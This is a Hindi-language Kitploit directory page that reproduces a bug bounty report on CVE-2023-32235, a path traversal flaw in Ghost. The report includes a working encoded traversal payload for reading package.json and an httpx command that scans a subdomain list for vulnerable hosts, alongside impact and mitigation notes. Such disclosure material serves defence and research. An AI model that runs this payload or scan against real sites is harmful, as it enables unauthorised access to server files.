Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Ghost-Path-Traversal-CVE-2023-32235- — एक Directory Traversal हमला (जिसे path traversal भी कहा जाता है) का उद्देश्य उन फ़ाइलों और निर्देशिकाओं तक पहुंचना है जो इच्छित फ़ोल्डर के बाहर संग्रहीत हैं। | Kitploit
उपकरण/GitHubGitHub/axroux/ghost-path-traversal-cve-2023-32235-
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubaxroux/ghost-path-traversal-cve-2023-32235-

Ghost-Path-Traversal-CVE-2023-32235-

एक Directory Traversal हमला (जिसे path traversal भी कहा जाता है) का उद्देश्य उन फ़ाइलों और निर्देशिकाओं तक पहुंचना है जो इच्छित फ़ोल्डर के बाहर संग्रहीत हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
413 साल पहलेअभी तक समीक्षित नहीं

बग बाउंटी रिपोर्ट - Ghost पथ ट्रैवर्सल (CVE-2023-32235)

सारांश

Ghost एप्लिकेशन एक पथ ट्रैवर्सल कमजोरी के प्रति संवेदनशील है, जिसे CVE-2023-32235 के रूप में पहचाना गया है। यह कमजोरी एक हमलावर को "package.json" फ़ाइल पथ में हेरफेर करके इच्छित निर्देशिका के बाहर के संवेदनशील फ़ाइलों तक पहुँचने की अनुमति देती है।

कमजोरी के विवरण

  • CVE ID: CVE-2023-32235
  • कमजोरी का प्रकार: पथ ट्रैवर्सल
  • प्रभावित एप्लिकेशन: Ghost
  • प्रभावित संस्करण: सभी संस्करण नवीनतम संस्करण X.X.X तक
  • प्रभाव: संवेदनशील फ़ाइलों तक अनधिकृत पहुँच, गोपनीय जानकारी के संभावित रिसाव।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

निम्नलिखित प्रूफ ऑफ कॉन्सेप्ट पथ ट्रैवर्सल कमजोरी को प्रदर्शित करता है:

root@kitploit:~
{{base-uri}}/assets/built%2F..%2F..%2F/package.json

पुनरुत्पादन के चरण

  1. "subs.txt" की एक लक्ष्य सूची तैयार करें जिसमें प्रासंगिक URL हों।
  2. httpx टूल का उपयोग करके कमजोरी का परीक्षण करने के लिए निम्नलिखित कमांड निष्पादित करें:
    root@kitploit:~
    httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200
    
  3. किसी भी सफल अनुरोध के लिए प्रतिक्रियाओं का निरीक्षण करें, जो पथ ट्रैवर्सल कमजोरी की उपस्थिति को इंगित करता है।

प्रभाव

इस कमजोरी के सफल शोषण से लक्ष्य सर्वर पर संवेदनशील फ़ाइलों तक अनधिकृत पहुँच हो सकती है। इससे गोपनीय जानकारी का रिसाव, उपयोगकर्ता की गोपनीयता से समझौता, और प्रभावित एप्लिकेशन की सुरक्षा को कमजोर किया जा सकता है।

अनुशंसा

इस कमजोरी को कम करने के लिए, फ़ाइल पथों को संभालते समय मजबूत इनपुट सत्यापन लागू करने और उपयोगकर्ता द्वारा प्रदत्त डेटा को स्वच्छ करने की सिफारिश की जाती है। डेवलपर्स को फ़ाइल पथों के लिए सीधे उपयोगकर्ता इनपुट स्वीकार करने से बचना चाहिए और इसके बजाय स्वीकार्य पथों की सफेदसूची बनाने या सुरक्षा-केंद्रित पुस्तकालयों का उपयोग करने जैसे सुरक्षित विकल्पों का उपयोग करना चाहिए।

टूल डाउनलोड करें